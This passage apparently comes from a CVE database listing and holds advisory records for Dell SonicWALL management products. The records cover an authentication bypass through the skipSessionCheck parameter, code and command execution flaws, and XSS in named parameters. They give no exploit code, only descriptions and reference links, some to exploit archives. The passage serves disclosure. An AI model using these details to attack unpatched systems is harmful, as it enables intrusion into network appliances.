"references": {
"reference_data": [
{
"name": "http://www.securitytracker.com/id/1028007",
"refsource": "MISC",
"url": "http://www.securitytracker.com/id/1028007"
},
{
"name": "http://www.securityfocus.com/bid/57446",
"refsource": "MISC",
"url": "http://www.securityfocus.com/bid/57446"
},
{
"name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366",
"refsource": "MISC",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366"
},
{
"name": "http://www.exploit-db.com/exploits/24203",
"refsource": "MISC",
"url": "http://www.exploit-db.com/exploits/24203"
},
{
"name": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html",
"refsource": "MISC",
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html"
},
{
"name": "https://packetstormsecurity.com/files/cve/CVE-2013-1360",
"refsource": "MISC",
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1360"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-1360",
"datePublished": "2020-02-11T15:44:43",
"dateReserved": "2013-01-14T00:00:00",
"dateUpdated": "2024-08-06T14:57:05.126Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-1359
Vulnerability from cvelistv5
Published
2020-02-11 16:42
Modified
2024-08-06 14:57
Severity ?
EPSS score ?
Summary
An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/57445 | x_refsource_MISC | |
| http://www.exploit-db.com/exploits/24204 | x_refsource_MISC | |
| http://www.exploit-db.com/exploits/24322 | x_refsource_MISC | |
| http://www.securitytracker.com/id/1028007 | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/81367 | x_refsource_MISC | |
| https://packetstormsecurity.com/files/author/7547/ | x_refsource_MISC | |
| https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns | x_refsource_MISC | |
| https://seclists.org/fulldisclosure/2013/Jan/125 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T14:57:05.116Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/57445"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/24204"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/24322"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1028007"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://packetstormsecurity.com/files/author/7547/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2013/Jan/125"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-01-17T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-11T16:42:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.securityfocus.com/bid/57445"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.exploit-db.com/exploits/24204"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.exploit-db.com/exploits/24322"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.securitytracker.com/id/1028007"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://packetstormsecurity.com/files/author/7547/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://seclists.org/fulldisclosure/2013/Jan/125"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-1359",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.securityfocus.com/bid/57445",
"refsource": "MISC",
"url": "http://www.securityfocus.com/bid/57445"
},
{
"name": "http://www.exploit-db.com/exploits/24204",
"refsource": "MISC",
"url": "http://www.exploit-db.com/exploits/24204"
},
{
"name": "http://www.exploit-db.com/exploits/24322",
"refsource": "MISC",
"url": "http://www.exploit-db.com/exploits/24322"
},
{
"name": "http://www.securitytracker.com/id/1028007",
"refsource": "MISC",
"url": "http://www.securitytracker.com/id/1028007"
},
{
"name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367",
"refsource": "MISC",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367"
},
{
"name": "https://packetstormsecurity.com/files/author/7547/",
"refsource": "MISC",
"url": "https://packetstormsecurity.com/files/author/7547/"
},
{
"name": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns",
"refsource": "MISC",
"url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns"
},
{
"name": "https://seclists.org/fulldisclosure/2013/Jan/125",
"refsource": "MISC",
"url": "https://seclists.org/fulldisclosure/2013/Jan/125"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-1359",
"datePublished": "2020-02-11T16:42:01",
"dateReserved": "2013-01-14T00:00:00",
"dateUpdated": "2024-08-06T14:57:05.116Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-8420
Vulnerability from cvelistv5
Published
2014-11-25 15:00
Modified
2024-08-06 13:18
Severity ?
EPSS score ?
Summary
The ViewPoint web application in Dell SonicWALL Global Management System (GMS) before 7.2 SP2, SonicWALL Analyzer before 7.2 SP2, and SonicWALL UMA before 7.2 SP2 allows remote authenticated users to execute arbitrary code via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| https://support.software.dell.com/product-notification/136814 | x_refsource_CONFIRM | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/98911 | vdb-entry, x_refsource_XF | |
| http://www.zerodayinitiative.com/advisories/ZDI-14-385/ | x_refsource_MISC | |
| http://www.securityfocus.com/bid/71241 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T13:18:47.985Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.software.dell.com/product-notification/136814"
},
{
"name": "dell-sonicwall-cve20148420-code-exec(98911)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98911"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-14-385/"
},
{
"name": "71241",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/71241"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-11-21T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The ViewPoint web application in Dell SonicWALL Global Management System (GMS) before 7.2 SP2, SonicWALL Analyzer before 7.2 SP2, and SonicWALL UMA before 7.2 SP2 allows remote authenticated users to execute arbitrary code via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-09-07T15:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.software.dell.com/product-notification/136814"
},
{
"name": "dell-sonicwall-cve20148420-code-exec(98911)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98911"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-14-385/"
},
{
"name": "71241",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/71241"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-8420",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The ViewPoint web application in Dell SonicWALL Global Management System (GMS) before 7.2 SP2, SonicWALL Analyzer before 7.2 SP2, and SonicWALL UMA before 7.2 SP2 allows remote authenticated users to execute arbitrary code via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.software.dell.com/product-notification/136814",
"refsource": "CONFIRM",
"url": "https://support.software.dell.com/product-notification/136814"
},
{
"name": "dell-sonicwall-cve20148420-code-exec(98911)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98911"
},
{
"name": "http://www.zerodayinitiative.com/advisories/ZDI-14-385/",
"refsource": "MISC",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-14-385/"
},
{
"name": "71241",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/71241"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-8420",
"datePublished": "2014-11-25T15:00:00",
"dateReserved": "2014-10-22T00:00:00",
"dateUpdated": "2024-08-06T13:18:47.985Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-0332
Vulnerability from cvelistv5
Published
2014-02-14 16:00
Modified
2024-08-06 09:13
Severity ?
EPSS score ?
Summary
Cross-site scripting (XSS) vulnerability in mainPage in Dell SonicWALL GMS before 7.1 SP2, SonicWALL Analyzer before 7.1 SP2, and SonicWALL UMA E5000 before 7.1 SP2 might allow remote attackers to inject arbitrary web script or HTML via the node_id parameter in a ScreenDisplayManager genNetwork action.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/65498 | vdb-entry, x_refsource_BID | |
| http://www.kb.cert.org/vuls/id/727318 | third-party-advisory, x_refsource_CERT-VN | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/91062 | vdb-entry, x_refsource_XF | |
| http://osvdb.org/103216 | vdb-entry, x_refsource_OSVDB | |
| http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_XSS_Resolved_in_7.1_SP2_and_7.2.pdf | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:13:09.580Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "65498",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/65498"
},
{
"name": "VU#727318",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/727318"
},
{
"name": "sonicwall-cve20140332-nodeid-xss(91062)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91062"
},
{
"name": "103216",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/103216"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_XSS_Resolved_in_7.1_SP2_and_7.2.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-02-11T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in mainPage in Dell SonicWALL GMS before 7.1 SP2, SonicWALL Analyzer before 7.1 SP2, and SonicWALL UMA E5000 before 7.1 SP2 might allow remote attackers to inject arbitrary web script or HTML via the node_id parameter in a ScreenDisplayManager genNetwork action."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"shortName": "certcc"
},
"references": [
{
"name": "65498",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/65498"
},
{
"name": "VU#727318",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/727318"
},
{
"name": "sonicwall-cve20140332-nodeid-xss(91062)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91062"
},
{
"name": "103216",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/103216"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_XSS_Resolved_in_7.1_SP2_and_7.2.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cert@cert.org",
"ID": "CVE-2014-0332",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in mainPage in Dell SonicWALL GMS before 7.1 SP2, SonicWALL Analyzer before 7.1 SP2, and SonicWALL UMA E5000 before 7.1 SP2 might allow remote attackers to inject arbitrary web script or HTML via the node_id parameter in a ScreenDisplayManager genNetwork action."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "65498",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/65498"
},
{
"name": "VU#727318",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/727318"
},
{
"name": "sonicwall-cve20140332-nodeid-xss(91062)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91062"
},
{
"name": "103216",
"refsource": "OSVDB",
"url": "http://osvdb.org/103216"
},
{
"name": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_XSS_Resolved_in_7.1_SP2_and_7.2.pdf",
"refsource": "CONFIRM",
"url": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_XSS_Resolved_in_7.1_SP2_and_7.2.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"assignerShortName": "certcc",
"cveId": "CVE-2014-0332",
"datePublished": "2014-02-14T16:00:00",
"dateReserved": "2013-12-05T00:00:00",
"dateUpdated": "2024-08-06T09:13:09.580Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2015-3990
Vulnerability from cvelistv5
Published
2015-05-20 18:00
Modified
2024-08-06 06:04
Severity ?
EPSS score ?
Summary
The GMS ViewPoint (GMSVP) web application in Dell Sonicwall GMS, Analyzer, and UMA EM5000 before 7.2 SP4 allows remote authenticated users to execute arbitrary commands via vectors related to configuration.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securitytracker.com/id/1032373 | vdb-entry, x_refsource_SECTRACK | |
| https://support.software.dell.com/product-notification/152178 | x_refsource_CONFIRM | |
| http://www.zerodayinitiative.com/advisories/ZDI-15-231/ | x_refsource_MISC | |
| http://www.securityfocus.com/bid/74756 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T06:04:02.256Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1032373",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1032373"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.software.dell.com/product-notification/152178"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-15-231/"
},
{
"name": "74756",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/74756"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-05-15T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The GMS ViewPoint (GMSVP) web application in Dell Sonicwall GMS, Analyzer, and UMA EM5000 before 7.2 SP4 allows remote authenticated users to execute arbitrary commands via vectors related to configuration."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Other",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-12-20T20:52:17",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "1032373",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1032373"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.software.dell.com/product-notification/152178"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-15-231/"
},
{
"name": "74756",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/74756"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "zdi-disclosures@trendmicro.com",
"ID": "CVE-2015-3990",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The GMS ViewPoint (GMSVP) web application in Dell Sonicwall GMS, Analyzer, and UMA EM5000 before 7.2 SP4 allows remote authenticated users to execute arbitrary commands via vectors related to configuration."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Other"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1032373",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1032373"
},
{
"name": "https://support.software.dell.com/product-notification/152178",
"refsource": "CONFIRM",
"url": "https://support.software.dell.com/product-notification/152178"
},
{
"name": "http://www.zerodayinitiative.com/advisories/ZDI-15-231/",
"refsource": "MISC",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-15-231/"
},
{
"name": "74756",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/74756"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2015-3990",
"datePublished": "2015-05-20T18:00:00",
"dateReserved": "2015-05-15T00:00:00",
"dateUpdated": "2024-08-06T06:04:02.256Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-5691
Vulnerability from cvelistv5
Published
2018-01-14 04:00
Modified
2024-08-05 05:40
Severity ?
EPSS score ?
Summary
SonicWall Global Management System (GMS) 8.1 has XSS via the `newName` and `Name` values of the `/sgms/TreeControl` module.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.vulnerability-lab.com/get_content.php?id=1819 | x_refsource_MISC | |
| http://documents.software.dell.com/sonicwall-gms-os/8.2/release-notes/known-issues?ParentProduct=867 | x_refsource_MISC | |
| https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0003 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T05:40:51.146Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.vulnerability-lab.com/get_content.php?id=1819"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://documents.software.dell.com/sonicwall-gms-os/8.2/release-notes/known-issues?ParentProduct=867"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0003"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-01-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "SonicWall Global Management System (GMS) 8.1 has XSS via the `newName` and `Name` values of the `/sgms/TreeControl` module."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-17T09:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.vulnerability-lab.com/get_content.php?id=1819"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://documents.software.dell.com/sonicwall-gms-os/8.2/release-notes/known-issues?ParentProduct=867"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0003"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-5691",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SonicWall Global Management System (GMS) 8.1 has XSS via the `newName` and `Name` values of the `/sgms/TreeControl` module."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.vulnerability-lab.com/get_content.php?id=1819",
"refsource": "MISC",
"url": "https://www.vulnerability-lab.com/get_content.php?id=1819"
},
{
"name": "http://documents.software.dell.com/sonicwall-gms-os/8.2/release-notes/known-issues?ParentProduct=867",
"refsource": "MISC",
"url": "http://documents.software.dell.com/sonicwall-gms-os/8.2/release-notes/known-issues?ParentProduct=867"
},
{
"name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0003",
"refsource": "CONFIRM",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0003"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-5691",
"datePublished": "2018-01-14T04:00:00",
"dateReserved": "2018-01-13T00:00:00",
"dateUpdated": "2024-08-05T05:40:51.146Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}